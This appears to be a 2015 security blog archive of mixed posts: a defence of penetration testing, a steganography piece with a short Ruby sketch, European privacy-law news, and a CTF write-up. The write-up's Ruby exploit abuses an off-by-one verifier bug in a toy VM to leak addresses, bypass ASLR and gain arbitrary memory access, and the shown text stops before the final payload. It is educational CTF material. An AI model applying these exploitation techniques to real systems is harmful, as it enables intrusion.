Monthly Archives: January 2015

In Defense of Ethical Hacking

Pete Herzog wrote an interesting piece on Dark Matters (Norse’s blog platform) a while back, and I’ve given it a few days to sink in because I didn’t want my response to be emotional. After a few days I’ve re-read the post a few more times and still have no idea where Pete, someone I otherwise consider fairly sane and smart (see his bio - http://blog.norsecorp.com/author/pherzog/), gets this premise he’s writing about. In fact, it annoyed me enough that I wrote up a response to his post… and Pete, I’m confused where this point of view comes from! I’d genuinely like to know… I’ll reach out and see if we can figure it out.

— For the sake of this blog post, I consider ethical hacking and penetration testing to effectively be the same thing. I know not everyone agrees, and that’s unfortunate, but I guess you can’t please everyone.

So here are my comments on Pete’s blog post titled “The Myth of Ethical Hacking” (http://blog.norsecorp.com/2015/01/27/the-myth-of-ethical-hacking/).



I thought reacting is what you did when you weren’t secure. And I thought ethical hacking was proactive, showing you could take advantage of opportunities left by the stupid people who did the security.
— Boy am I glad he doesn’t think this way anymore. Reacting is part of life, but it’s not done because you’re insecure; it’s done because business and technology, along with your adversaries, are dynamic. It’s like standing outside without an umbrella. It’s not raining… but if you stand there long enough, you’ll need an umbrella. It’s not that you are stupid, it’s that weather changes. If you’re in Chicago, like I am, this happens about every 2.7 seconds.
I also thought ethical hacking and security testing were the same thing, because while security testing focused on making sure all security controls were there and working right and ethical hacking focused on showing a criminal could penetrate existing security controls, both were about proactively learning what needed to be better secured.
— That’s an interesting distinction. I can’t say I believe this is any more than a simple difference in word choice. Isn’t this all about validation of the security an organization thinks they have, versus the reality of how attackers act and what they will target? I guess I could be wrong, but these terms: vulnerability testing, penetration testing, ethical hacking, security testing — they create confusion in the people trying to consume these services, understand security, and hire. Do they have any real value? I think this is one reason standards efforts by people in the security testing space were started: to demystify, de-obfuscate, and lessen confusion. Clearly it’s not working as intended?
Ethical hacking, penetration testing, and red-teaming are still considered valid ways to improve security posture despite that they test the tester as much, if not more, than the infrastructure.
— Now, here’s a statement that I largely agree with. It’s not controversial anymore to say this. This is why things like the PTES (Penetration Testing Execution Standard) were born. Taking a look at the people who are behind this standard, you can easily see that it’s not just another shot in the dark or empty effort - http://www.pentest-standard.org/index.php/FAQ. Standardizing how a penetration test (or ethical hack; these should be the same thing, in my mind) is performed goes a long way toward clearing up the confusion. Let me address red teaming for a minute too. Red Team exercises are not the same thing as penetration testing and ethical hacking — not really — it’s like the difference between asking someone if they can pick the lock on the front door, versus daring someone to break into your house and steal your passport without reservation. Red Teaming is a more aggressive approach. I’ve heard some call Red Team exercises “closer to what an actual attacker would behave like”; your mileage may vary on that one. Bottom line, though, you always get the quality you ask for (pay for). If you are willing to pay for high-grade talent, generally speaking you’ll get high-grade talent. If you’re looking for a cheap penetration test, your results will likely be vastly different, because the resources on the job may not be as senior or knowledgeable. The other thing here is this — not all penetration testers are experts in all the technologies at your shop. Keep this in mind. Some folks are magicians with a Linux/Unix system, while others have grown their expertise in the Windows world. Some are web application experts, some are infrastructure experts, and some are generalists. The bottom line is that this is true, something that should be accounted for, and largely not the fault of the tester.
Then again nearly everything has a positive side we can see if we squint. And as a practical, shake-the-CEO-into-awareness technique, criminal hacking simulations should be good for fostering change in a security posture.
— I read this and wonder to myself… if the CEO hasn’t already been “shaken into awareness” by the headlines in the papers and on the nightly news, then there is something else going on that a successful ethical-hacking ransack of the enterprise likely won’t solve.
So somehow, ethical hackers with their penetration testing and red-teaming, despite any flaws, have taken on this status of better security than, say, vulnerability scanning. Because there’s a human behind it? Is it artisan, and thus we pay more?
— Wait, what?! If you see these two as equal, then you’ve either done a horrible job at picking your ethical hacker/penetration testers, or you don’t understand what you’re saying. As someone who spent a few years demonstrating to companies that web application security tools were critical to their success, I’ve never, ever said they can replace a human tester. Ever. To answer the question directly — YES, because there’s a human behind it, this is an entirely different thing. See above about quality of penetration tester, but the point stands.
It also has a fatal flaw: It tests for known vulnerabilities. However, in great marketing moves of the world volume 1, that is exactly how they promote it. That’s why companies buy it. But if an ethical hacker markets that they test only for known vulnerabilities, we say they suck.
— Oh, I think I see what’s going on here. The author is confusing vulnerability assessment with penetration testing, maybe. That’s the only logical explanation I can think of. Penetration testers have a massive advantage over scanning tools because of this wonderful thing called the human intellect. They can see and interpret errors that systems kick back. Tools look for patterns and respond accordingly, so there are times when a human can see an error message and understand what it’s implying, but the machine has no such ability. In spite of all of technology’s advancements, tools are still using regular expressions and some rudimentary if-then clauses for pattern recognition. Machines, and by extension software, do not think. This gives software a disadvantage against a human 100% of the time.
Now vulnerability scanning is indeed reactive. We wait for known flaws to be known, scan for them, and we then react to that finding by fixing it. Ethical hacking is indeed proactive. But not because it gives the defender omniscient threat awareness, but rather so we can know all the ways where someone can break in. Then we can watch for it or even fix it.
— I’m going to ignore the whole reactive-vs-proactive debate here. I don’t believe it’s productive to the post, and I think many people don’t understand what these terms mean in security anyway. First, you’ll never, ever know “all the ways someone can break in”, ever. Never. That’s the beauty of the human mind. Human beings are a creative bunch, and when properly incentivized, we will find a way once we’ve exhausted all the known ways. However, there’s a little caveat here, which I don’t believe is talked about enough. The reason we won’t ever know all the ways someone can break in, even if we give humans the ability to find all the ways, is this thing called scope, and time. Penetration testers, ethical hackers, and whatever else you want to call them are time-boxed. Rarely do you get an open-ended contract, or even, in the case of an internal resource, the ability to dedicate all the time you have to the task of finding ways to break in. Furthermore, there are typically many, many, many ways to break in. Systems can be misconfigured, unpatched, and left exposed in a million different ways. And even if you did have all the time you needed, these systems are dynamic and are going to change on you at some point, unless you work in one of “those” organizations, and if so you’ve got bigger problems.
But does it really work that way? Isn’t what passes for ethical hacking too often just running vulnerability scanners to find the low hanging fruit and exploit that to prove a criminal could get in? Isn’t that really just finding known vulnerabilities like a vulnerability scanner does, but with a little verification thrown in?
— And here it is. Let me answer this question from the many, many people I know who do actual ethical hacking/penetration testing: no. Also if you find this to be actually true in your experience, you’re getting the wrong penetration testers. Maybe fire your provider or staff.
There’s this myth that ethical hackers will make better security by breaking through existing security in complicated, sometimes clever ways that point out the glaring flaw(s) of the moment for remediation.
— Talk to someone who does serious penetration testing for a living, or manages one of these teams. Many of them have a store of clever, custom code up their sleeves but rarely have to use it because the systems they test have so much broken on them that dropping custom code isn’t even remotely necessary.
But we know that all too often it’s just vulnerability scanning with scare tactics.
— Again, you’re dealing with some seriously amateurish people or providers. Fire them.
And when there’s no way in, they play the social engineering card.
— a) I don’t see the issue with this approach, b) there’s a 99.9% chance there is a way in without “playing the social engineering card”.
One of the selling points of ethical hacking is the skilled use of social engineering. Let me save you some money: It works.
— Yes, 90%+ of the time, even when the social engineer isn’t particularly skilled, it works. Why? Human nature. Also, employees who don’t know better. So what if it works, though? You still need to leverage that testing to show real use cases of how your defenses were easily penetrated, for educational purposes. Record it. Highlight those employees who let that guy with the four coffee cups in his hands through the turnstile without asking for a badge… but do it constructively, so that they and their peers will remember. Testing should drive awareness, and real-life use cases are priceless.
So if ethical hacking as it’s done is a myth…
— Let me stop you right there. It’s not; you’ve just had some terrible experiences that I don’t believe are indicative of the wider industry. And since the rest of the article is based on this premise, I think we’re done here.

Plausible Deniability – The Impact of Crypto Law

So, after the recent terror attacks in Paris, the UK suffered from the usual knee-jerk reactions from the technologically-challenged chaps we have governing us. “Let’s ban encryption the Government can’t crack”, they say. Many people mocked this, saying that terrorists were flouting laws anyway, so why would they obey the rules on crypto? How would companies that rely on crypto do business in the UK (that’s everyone, by the way)?


Well, I’m not going to dwell on those points, because I am rather late to the party in writing this piece, and because those points are boring :) In any case, if the Internet went all plaintext on us, web filtering would be a whole lot easier, and Smoothwall’s HTTPS features wouldn’t be quite so popular!


Suppose the real intent of the law is to be able to arrest someone just for having or sending encrypted data - the equivalent of arresting someone for looking funny (or stepping on the cracks in pavements). What would our miscreants do next?


Well, the idea we need to explore is “plausible deniability”. For example, you are a De Niro-esque mafia enforcer. You need to carry a baseball bat for the commission of your illicit work. If you want to be able to fool the local law enforcement, you might also carry a baseball. “I’m going to play baseball, officer” (it may not go down well at 3 in the morning when you have a corpse in the back seat of your car, but it’s a start). You conceal your weapon among things that make it look normal. It is possible to conceal the cryptography “weapon” in the same way, so that law enforcement can’t see it’s there and thus can’t arrest anyone. Is it possible to say “sorry officer, no AES256 here, just a picture of a kitteh”? If so, you have plausible deniability.

What’s the crypto equivalent? Steganography. The idea of hiding a message inside other data, such that it is very hard to prove a hidden message is there at all. Here’s an example:



This image of a slightly irritated-looking cat in a shoebox contains a short message. It will be very hard to find, because the original image is only on my hard disk, so you have nothing to compare against. There are many steganographic methods for hiding the text, and the text is extremely short compared to the image. If I had encrypted the text… well, you would find it even harder, because you couldn’t even look for words. It is left as an exercise for the reader to tell me in a comment what the message is.
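
To make the idea concrete, here’s a minimal least-significant-bit (LSB) sketch in Ruby. To be clear, this illustrates the general technique, not the method used on the image above: each message bit replaces the lowest bit of one carrier byte (on a real image you’d apply this to decoded pixel values, not the compressed file).

# Minimal LSB steganography sketch (illustrative only - not the method
# used on the cat picture). Each message bit replaces the lowest bit of
# one carrier byte; photographic low bits are effectively noise, so the
# change is invisible to the eye.
def stego_hide(carrier, message)
  bits  = message.unpack("B*")[0].chars.map(&:to_i)
  bytes = carrier.bytes
  bits.each_with_index { |bit, i| bytes[i] = (bytes[i] & 0xFE) | bit }
  bytes.pack("C*")
end

def stego_extract(carrier, length)
  bits = carrier.bytes[0, length * 8].map { |b| b & 1 }
  [bits.join].pack("B*")
end

# stego_extract(stego_hide(pixels, "hi there"), 8)  # => "hi there"

Without the original bytes to diff against, detecting the change means doing statistics on what looks like noise - which is exactly the point.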

Finland Introduces New Electronic Privacy Requirements for Online Communications Services Providers

On January 1, 2015, Finland’s Information Security Code (2014/917, the “Code”) became effective. The Code introduces substantial revisions to Finland’s existing electronic communications legislation and consolidates several earlier laws into a single, unified text. Although many of these earlier laws remain unchanged, the Code includes extensive amendments in a number of areas.

The most significant change is the broadened obligation to protect the confidentiality of communications, which previously applied only to telecommunications providers. Under the Code, this obligation applies to all providers of electronic communications services, such as instant messaging services and many online social networking tools. As a result of this change, providers of these services have an obligation to maintain the security and confidentiality of electronic messages sent over their systems.

Another important new provision allows for the extraterritorial application of the Code. Businesses that are established outside the EU, but offer their services in Finnish or otherwise target Finnish residents are, in theory, subject to the requirements of the Code. This is a similar approach to that taken in the forthcoming EU General Data Protection Regulation, which seeks to require businesses located outside the EU to comply with EU privacy laws if they (1) offer goods or services to EU residents, or (2) monitor the behavior of EU residents. How these extraterritoriality provisions will be enforced against businesses that have no assets in the EU remains an open question at this stage.

European Data Protection Supervisor Speaks on Data Protection Day

On January 28, 2015, in connection with Data Protection Day, newly appointed European Data Protection Supervisor (“EDPS”) Giovanni Buttarelli spoke about future challenges for data protection. Buttarelli encouraged the EU “to lead by example as a beacon of respect for digital rights,” and “to be at the forefront in shaping a global, digital standard for privacy and data protection which centers on the rights of the individual.” Buttarelli stressed that in the context of global technological changes, “the EU has to make existing data protection rights more effective in practice, and to allow citizens to more easily exercise their rights.”

Buttarelli also gave his opinion on the “security versus right-to-privacy” debate, which has been the subject of intense discussions in the EU after the deadly attacks on Charlie Hebdo in France. While EU policymakers are debating new measures to tackle terrorism that implicate privacy, Buttarelli encouraged “legislators not to act on the basis of emotions and to consider the long term effects.” He stated that privacy is a fundamental right and that measures that undermine privacy in the name of security are lawful only after a showing that the measures are necessary and proportional to the privacy and security interests at issue.

Buttarelli also stated that he intends to work closely with EU institutions and assist their progress on multiple pending initiatives, including the EU Data Protection Reform package. According to Buttarelli, the ongoing legal uncertainty and fragmented data protection framework is not sustainable and is impacting citizens and businesses. The EDPS aims to assist legislators in enacting the EU Data Protection Reform package in order to reinforce EU privacy and data protection standards and promote a culture of data protection.

Read the interview with Buttarelli.

View the EDPS press release.

German DPAs Host Event Regarding U.S.-EU Safe Harbor Framework and Initiate Administrative Proceedings Against Two U.S. Companies

On January 28, 2015, the German conference of data protection commissioners hosted a European Data Protection Day event called Europe: Safer Harbor for Data Protection? – The Future Use of the Different Level of Data Protection between the EU and the US.

At the conference, the speakers discussed the validity of the U.S.-EU Safe Harbor Framework. Previously, in 2013, the German data protection commissioners stated that they would review whether to suspend data transfers made from Germany to the U.S. pursuant to the U.S.-EU Safe Harbor Framework. During the conference, it was revealed that the data protection commissioners initiated administrative proceedings against two U.S. companies in the German states of Berlin and Bremen with respect to their data transfers made pursuant to the U.S.-EU Safe Harbor Framework. At this time, the identities of the two U.S. companies are unknown. In addition, details are murky regarding the nature of the administrative proceedings, the theory of law being used by the commissioners to stop the data transfers, and the underlying facts that led to the administrative proceedings. The conference panels also discussed the comprehensive mass surveillance by U.S. intelligence agencies from a fundamental rights perspective, as well as these U.S. intelligence agencies’ access to information regarding EU data subjects.

We will update this blog post as we become aware of additional details.

GitS 2015: Giggles (off-by-one virtual machine)

Welcome to part 3 of my Ghost in the Shellcode writeup! Sorry for the delay, I actually just moved to Seattle. On a sidenote, if there are any Seattle hackers out there reading this, hit me up and let's get a drink!

Now, down to business: this writeup is about one of the Pwnage 300 levels; specifically, Giggles, which implements a very simple and very vulnerable virtual machine. You can download the binary here, the source code here (with my comments - I put XXX near most of the vulnerabilities and bad practices I noticed), and my exploit here.

One really cool aspect of this level was that they gave source code, a binary with symbols, and even a client (that's the last time I'll mention their client, since I dislike Python :) )! That means we could focus on exploitation and not reversing!

The virtual machine

I'll start by explaining how the virtual machine actually works. If you worked on this level yourself, or you don't care about the background, you can just skip over this section.

Basically, there are three operations: TYPE_ADDFUNC, TYPE_VERIFY, and TYPE_RUNFUNC.

The usual process is that the user adds a function using TYPE_ADDFUNC, which is made up of one (possibly zero?) or more operations. Then the user verifies the function, which checks for bounds violations and stuff like that. Then if that succeeds, the user can run the function. The function can take up to 10 arguments and output as much as it wants.

There are only seven different opcodes (types of operations), and one of the tricky parts is that none of them deal with absolute values—only other registers. They are:

  • OP_ADD reg1, reg2 - add two registers together, and store the result in reg1
  • OP_BR <addr> - branch (jump) to a particular instruction - the granularity of these jumps is actually per-instruction, not per-byte, so you can't jump into the middle of another instruction, which ruined my initial instinct :(
  • OP_BEQ <addr> <reg1> <reg2> / OP_BGT <addr> <reg1> <reg2> - branch if equal and branch if greater than are basically the same as OP_BR, except the jumps are conditional
  • OP_MOV <reg1> <reg2> - set reg1 to equal reg2
  • OP_OUT <reg> - output a register (gets returned as a hex value by RUNFUNC)
  • OP_EXIT - terminate the function

To expand on the output just a bit - the program maintains the output in a buffer that's basically a series of space-separated hex values. At the end of the program (when it either terminates or OP_EXIT is called), it's sent back to the client. I was initially worried that I would have to craft some hex-with-spaces shellcode, but thankfully that wasn't necessary. :)

There are 10 different registers that can be accessed. Each one is 32 bits. The operand values, however, are all 64-bit values.
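
To make those sizes concrete: each operation is a 16-bit opcode followed by three 64-bit operands, 26 bytes in total (more on that number later). Here’s a sketch of what the create_op() helper in my exploit builds (the real one is in the linked code):

# Sketch of create_op(): a 16-bit opcode plus three 64-bit operands,
# 26 bytes total (2 + 8 + 8 + 8).
def create_op(opcode, operand1 = 0, operand2 = 0, operand3 = 0)
  [opcode, operand1, operand2, operand3].pack("SQQQ")
end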

The verification process basically ensures that the registers and the addresses are mostly sane. Once the function has been validated, a flag is switched and it can be called. If you call the function before verifying it, it'll fail immediately. If you could run arbitrary, unchecked bytecode, you'd be able to address register 1000000, say, and read/write elsewhere in memory; that's exactly what the verification is meant to prevent.

Speaking of the vulnerability, the bug that leads to full code execution is in the verify function - can you find it before I tell you?

The final thing to mention is arguments: when you call TYPE_RUNFUNC, you can pass up to (I think) 10 arguments, which are 32-bit values that are placed in the first 8 registers.
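
Putting the whole process together, here’s roughly what a trivial function looks like through my exploit’s API (a sketch; the helper implementations are in the linked exploit). It adds the first two arguments and outputs the sum:

# Add the first two arguments together and output the result.
ops = []
ops << create_op(OP_ADD, 0, 1)  # reg0 = reg0 + reg1
ops << create_op(OP_OUT, 0)     # append reg0 to the output buffer
ops << create_op(OP_EXIT)       # terminate cleanly

add(s, ops)                 # TYPE_ADDFUNC
verify(s, 0)                # TYPE_VERIFY
puts execute(s, 0, [1, 2])  # TYPE_RUNFUNC - prints something like "00000003 "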

Fixing the binary

I've gotten pretty efficient at patching binaries for CTFs! I've talked about this before, so I'll just mention what I do briefly.

I do these things immediately, before I even start working on the challenge:

  • Replace the call to alarm() with NOPs
  • Replace the call to fork() with "xor eax, eax", followed by NOPs
  • Replace the call to drop_privs() with NOPs (if I can find it)

That way, the process won't be killed after a timeout, and I can debug it without worrying about child processes holding onto ports and other irritations. NOPing out drop_privs() means I don't have to worry about adding a user or running it as root or creating a folder for it. If you look at the objdump outputs diffed, here's what it looks like:

--- a   2015-01-27 13:30:29.000000000 -0800
+++ b   2015-01-27 13:30:31.000000000 -0800
@@ -1,5 +1,5 @@

-giggles:     file format elf64-x86-64
+giggles-fixed:     file format elf64-x86-64


 Disassembly of section .interp:
@@ -1366,7 +1366,10 @@
     125b:      83 7d f4 ff             cmp    DWORD PTR [rbp-0xc],0xffffffff
     125f:      75 02                   jne    1263 <loop+0x3d>
     1261:      eb 68                   jmp    12cb <loop+0xa5>
-    1263:      e8 b8 fc ff ff          call   f20 <fork@plt>
+    1263:      31 c0                   xor    eax,eax
+    1265:      90                      nop
+    1266:      90                      nop
+    1267:      90                      nop
     1268:      89 45 f8                mov    DWORD PTR [rbp-0x8],eax
     126b:      83 7d f8 ff             cmp    DWORD PTR [rbp-0x8],0xffffffff
     126f:      75 02                   jne    1273 <loop+0x4d>
@@ -1374,14 +1377,26 @@
     1273:      83 7d f8 00             cmp    DWORD PTR [rbp-0x8],0x0
     1277:      75 48                   jne    12c1 <loop+0x9b>
     1279:      bf 1e 00 00 00          mov    edi,0x1e
-    127e:      e8 6d fb ff ff          call   df0 <alarm@plt>
+    127e:      90                      nop
+    127f:      90                      nop
+    1280:      90                      nop
+    1281:      90                      nop
+    1282:      90                      nop
     1283:      48 8d 05 b6 1e 20 00    lea    rax,[rip+0x201eb6]        # 203140 <USER>
     128a:      48 8b 00                mov    rax,QWORD PTR [rax]
     128d:      48 89 c7                mov    rdi,rax
-    1290:      e8 43 00 00 00          call   12d8 <drop_privs_user>
+    1290:      90                      nop
+    1291:      90                      nop
+    1292:      90                      nop
+    1293:      90                      nop
+    1294:      90                      nop
     1295:      8b 45 ec                mov    eax,DWORD PTR [rbp-0x14]
     1298:      89 c7                   mov    edi,eax

I just use a simple hex editor on Windows, xvi32.exe, to take care of that. But you can do it in countless other ways, obviously.

What's wrong with verifyBytecode()?

Have you found the vulnerability yet?

I'll give you a hint: look at the comparison operators in this function:

int verifyBytecode(struct operation * bytecode, unsigned int n_ops)
{
    unsigned int i;
    for (i = 0; i < n_ops; i++)
    {
        switch (bytecode[i].opcode)
        {
            case OP_MOV:
            case OP_ADD:
                if (bytecode[i].operand1 > NUM_REGISTERS)
                    return 0;
                else if (bytecode[i].operand2 > NUM_REGISTERS)
                    return 0;
                break;
            case OP_OUT:
                if (bytecode[i].operand1 > NUM_REGISTERS)
                    return 0;
                break;
            case OP_BR:
                if (bytecode[i].operand1 > n_ops)
                    return 0;
                break;
            case OP_BEQ:
            case OP_BGT:
                if (bytecode[i].operand2 > NUM_REGISTERS)
                    return 0;
                else if (bytecode[i].operand3 > NUM_REGISTERS)
                    return 0;
                else if (bytecode[i].operand1 > n_ops)
                    return 0;
                break;
            case OP_EXIT:
                break;
            default:
                return 0;
        }
    }
    return 1;
}

Notice how it checks every operation? Every bounds check uses > instead of >=. Valid register indices run from 0 to NUM_REGISTERS - 1 (and valid branch targets from 0 to n_ops - 1), so an operand equal to NUM_REGISTERS, or a branch target equal to n_ops, passes validation. That's an off-by-one error. Oops!

Information leak

There are actually a lot of small issues in this code. The first good one I noticed was that you can output one extra register. Here's what I mean (grab my exploit if you want to understand the API):

def demo()
  s = TCPSocket.new(SERVER, PORT)

  ops = []
  ops << create_op(OP_OUT, 10)  # registers are indexed 0-9, so 10 is one past the end
  add(s, ops)
  verify(s, 0)                  # passes, thanks to the off-by-one in verifyBytecode()
  result = execute(s, 0, [])

  pp result
end

The output of that operation is:
"42fd35d8 "

Which, it turns out, is a memory address that's right after a "call" instruction. A return address!? Can it be this easy!?

It turns out that, no, it's not that easy. While I can read/write to that address, effectively bypassing ASLR, it turned out to be some left-over memory from an old call. I didn't even end up using that leak, either; I found a better one!

The actual vulnerability

After finding the off-by-one bug that let me read an extra register, I didn't really think much more about it. Later on, I came back to the verifyBytecode() function and noticed that the BR/BEQ/BGT instructions have the exact same bug! You can branch to the last instruction + 1, where it keeps running unverified memory as if it's bytecode!

What comes after the last instruction in memory? Well, it turns out to be a whole bunch of zeroes (00 00 00 00...), then other functions you've added, verified or otherwise. An instruction is 26 bytes long in memory (two bytes for the opcode, plus three 64-bit operands), and an all-zero 26-byte instruction actually maps to "add reg0, reg0", which is nice and safe to run over and over again (although it does screw up the value in reg0).

Aligning the interpreter

At this point, it got a bit complicated. Sure, I'd found a way to break out of the sandbox and run unverified code, but it's not as straightforward as you might think.

The problem? The spacing of the different "functions" in memory (that is, groups of operations) isn't a multiple of 26 bytes, thanks to headers, so if you break out of one function and into another, you wind up trying to execute bytecode that's somewhat offset.

In other words, if your second function starts at address 0, the interpreter tries to run the bytecode at -12 (give or take). The bytecode at -12 just happens to be the number of instructions in the function, so the first opcode is actually equal to the number of operations (so if you have three operations in the function, the first operation will be opcode 3, or BEQ). Its operands are bits and pieces of the opcodes and operands. Basically, it's a big mess.

To get this working, I wanted to basically just skip over that function altogether and run the third function (which would hopefully be a little better aligned). Basically, I wanted the function to do nothing dangerous, then continue on to the third function.

Here's the code I ended up writing (sorry the formatting isn't great, check out the exploit I linked above to see it better):

# This creates a valid-looking bytecode function that jumps out of bounds,
# then a non-validated function that puts us in a more usable bytecode
# escape
def init()
  puts("[*] Connecting to #{SERVER}:#{PORT}")
  s = TCPSocket.new(SERVER, PORT)
  #puts("[*] Connected!")

  ops = []

  # This branches to the second instruction - which doesn't exist
  ops << create_op(OP_BR, 1)
  add(s, ops)
  verify(s, 0)

  # This little section takes some explaining. Basically, we've escaped the bytecode
  # interpreter, but we aren't aligned properly. As a result, it's really irritating
  # to write bytecode (for example, the code of the first operation is equal to the
  # number of operations!)
  #
  # Because there are 4 opcodes below, it performs opcode 4, which is 'mov'. I ensure
  # that both operands are 0, so it does 'mov reg0, reg0'.
  #
  # After that, the next one is a branch (opcode 1) to offset 3, which effectively
  # jumps past the end and continues on to the third set of bytecode, which is our
  # ultimate payload.

  ops = []
  # (operand = count)
  #                  |--|               |---|                                          <-- inst1 operand1 (0 = reg0)
  #                          |--------|                    |----|                      <-- inst1 operand2 (0 = reg0)
  #                                                                        |--|        <-- inst2 opcode (1 = br)
  #                                                                  |----|            <-- inst2 operand1
  ops << create_op(0x0000, 0x0000000000000000, 0x4242424242000000, 0x00003d0001434343)
  #                  |--|              |----|                                          <-- inst2 operand1
  ops << create_op(0x0000, 0x4444444444000000, 0x4545454545454545, 0x4646464646464646)
  # The values of these don't matter, as long as we still have 4 instructions
  ops << create_op(0xBBBB, 0x4747474747474747, 0x4848484848484848, 0x4949494949494949)
  ops << create_op(0xCCCC, 0x4a4a4a4a4a4a4a4a, 0x4b4b4b4b4b4b4b4b, 0x4c4c4c4c4c4c4c4c)

  # Add them
  add(s, ops)

  return s
end

The comments explain it pretty well, but I'll explain it again. :)

The first opcode in the unverified function is, as I mentioned, equal to the number of operations. We create a function with 4 operations, which makes it a MOV instruction. Performing a MOV is pretty safe, especially since reg0 is already screwed up.

The two operands to instruction 1 are parts of the opcodes and operands of the first function. And the opcode for the second instruction is part of the third operand in the first operation we create. Super confusing!

Effectively, this ends up running:

mov reg0, reg0
br 0x3d
; [bad instructions that get skipped]

I'm honestly not sure why I chose 0x3d as the jump distance; I suspect it's just a number that I was testing with that happened to work. The instructions after the BR don't matter, so I just fill them in with garbage that's easy to recognize in a debugger.

So basically, this function just does nothing, effectively, which is exactly what I wanted.

Getting back in sync

I hoped that the third function would run perfectly, but because of math, it still doesn't. However, the operation count no longer matters in the third function, which is good enough for me! After doing some experiments, I determined that the instructions are unaligned by 0x10 (16) bytes. If you pad the start with 0x10 bytes then add instructions as normal, they'll run completely unverified.

To build the opcodes for the third function, I added a parameter to the add() function that lets you offset things:

#[...]
  # We have to cleanly exit
  ops << create_op(OP_EXIT)

  # Add the list of ops, offset by 16 (that's how the math worked out)
  add(s, ops, 16)
#[...]

Now you can run entirely unverified bytecode instructions! That means full read/write/execute of arbitrary addresses relative to the base address of the registers array. That's awesome! Because the registers array is on the stack, we have read/write access relative to a stack address. That means you can trivially read/write the return address and leak addresses of the binary, libc, or anything you want. ASLR bypass and RIP control instantly!
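
Since every read and write is expressed as a register index, turning an absolute address into an index is simple arithmetic. The exploit does this math inline, but conceptually it's just a helper like this (hypothetical; no reg_for exists in my code by that name, and @@registers is the base leaked below):

# Registers are 4-byte slots on the stack, so any address can be expressed
# as an out-of-range "register number" relative to the array's base.
def reg_for(addr)
  (addr - @@registers) / 4
end

# OP_OUT on reg_for(target) then reads the 4 bytes at target; reading two
# adjacent "registers" leaks a full 64-bit value.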

Leaking addresses

There are two separate sets of addresses that need to be leaked. It turns out that even though ASLR is enabled, the addresses don't actually randomize between different connections, so I can leak addresses, reconnect, leak more addresses, reconnect, and run the exploit. It's not the cleanest way to solve the level, but it worked! If this didn't work, I could have written a simple multiplexer bytecode function that does all these things using the same function.

I mentioned I can trivially leak the binary address and a stack address. Here's how:

# This function leaks two addresses: a stack address and the address of
# the binary image (basically, defeating ASLR)
def leak_addresses()
  puts("[*] Bypassing ASLR by leaking stack/binary addresses")
  s = init()

  # There's a stack address at offsets 24/25
  ops = []
  ops << create_op(OP_OUT, 24)
  ops << create_op(OP_OUT, 25)

  # 26/27 is the return address, we'll use it later as well!
  ops << create_op(OP_OUT, 26)
  ops << create_op(OP_OUT, 27)

  # We have to cleanly exit
  ops << create_op(OP_EXIT)

  # Add the list of ops, offset by 16 (that's how the math worked out)
  add(s, ops, 16)

  # Run the code
  result = execute(s, 0, [])

  # The result is a space-delimited array of hex values, convert it to
  # an array of integers
  a = result.split(/ /).map { |str| str.to_i(16) }

  # Read the two values in and do the math to calculate them
  @@registers = ((a[1] << 32) | (a[0])) - 0xc0
  @@base_addr = ((a[3] << 32) | (a[2])) - 0x1efd

  # User output
  puts("[*] Found the base address of the register array: 0x#{@@registers.to_s(16)}")
  puts("[*] Found the base address of the binary: 0x#{@@base_addr.to_s(16)}")

  s.close
end

Basically, we output registers 24, 25, 26, and 27. Since each register is only 4 bytes, you have to OUT two adjacent registers to leak a 64-bit address.

Registers 24 and 25 are an address on the stack. The address is 0xc0 bytes above the address of the registers variable (which is the base address of our overflow, and therefore needed for calculating offsets), so we subtract that. I determined the 0xc0 value using a debugger.

Registers 26 and 27 are the return address of the current function, which happens to be 0x1efd bytes into the binary (determined with IDA). So we subtract that value from the result and get the base address of the binary.

I also found a way to leak a libc address here, but since I never got a copy of libc I didn't bother keeping that code around.

Now that we have the base address of the binary and the address of the registers, we can use the OUT and MOV operations, plus a little bit of math, to read and write anywhere in memory.

Quick aside: getting enough sleep

You may not know this, but I work through CTF challenges very slowly. I like to understand every aspect of everything, so I don't rush. My secret is, I can work tirelessly at these challenges until they're complete. But I'll never win a race.

I got to this point at around midnight, after working nearly 10 hours on this challenge. Most CTFers will wonder why it took 10 hours to get here, so I'll explain again: I work slowly. :)

The problem is, I forgot one very important fact: that the operands to each operation are all 64-bit values, even though the arguments and registers themselves are 32-bit. That means we can reach any address in memory relative to the register array. I thought they were 32-bit, however, and since the process is 64-bit I figured I'd be able to read/write the stack, but not addresses in the binary! That wasn't true (I could write anywhere), but I didn't know that. So I was trying a bunch of crazy stack stuff to get it working, but ultimately failed.

At around 2am I gave up and played video games for an hour, then finished the book I was reading. I went to bed at about 3:30am, still thinking about the problem. Lying in bed around 4am, it clicked that register numbers could be 64-bit, so I got up and had it finished by about 7am. :)

The moral of this story is: sometimes it pays to get some rest when you're struggling with a problem!

+rwx memory!?

The authors of the challenge must have been feeling extremely generous: they gave us a segment of memory that's readable, writable, and executable! You can write code to it and then run it! Here's where it's declared:

void * JIT;     // TODO: add code to JIT functions

//[...]

    /* Map 4096 bytes of executable memory */
    JIT = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

A pointer to the memory is stored in a global variable. Since we have the ability to read an arbitrary address—once I realized my 64-bit problem—it was pretty easy to read the pointer:

def leak_rwx_address()
  puts("[*] Attempting to leak the address of the mmap()'d +rwx memory...")
  s = init()

  # This offset is always constant, from the binary
  jit_ptr = @@base_addr + 0x20f5c0

  # Read both halves of the address - the read is relative to the stack-
  # based register array, and has a granularity of 4, hence the math
  # I'm doing here
  ops = []
  ops << create_op(OP_OUT, (jit_ptr - @@registers) / 4)
  ops << create_op(OP_OUT, ((jit_ptr + 4) - @@registers) / 4)
  ops << create_op(OP_EXIT)
  add(s, ops, 16)
  result = execute(s, 0, [])

  # Convert the result from a space-delimited hex list to an integer array
  a = result.split(/ /).map { |str| str.to_i(16) }

  # Read the address
  @@rwx_addr = ((a[1] << 32) | (a[0]))

  # User output
  puts("[*] Found the +rwx memory: 0x#{@@rwx_addr.to_s(16)}")

  s.close
end

Basically, we know the pointer to the JIT code is at the base_addr + 0x20f5c0 (determined with IDA). So we do some math with that address and the base address of the registers array (dividing by 4 because that's the width of each register).

Finishing up

Now that we can run arbitrary bytecode instructions, we can read, write, and execute any address. But there was one more problem: getting the code into the JIT memory.

It seems pretty straightforward, since we can write to arbitrary memory, but there's a problem: the assembly language has no absolute values, which means I can't directly write a bunch of constants to memory. What I could do, however, is write values from registers to memory, and I can set the registers by passing in arguments.

BUT, reg0 gets messed up and two registers are wasted because I have to use them to overwrite the return address. That means I have 7 32-bit registers that I can use.

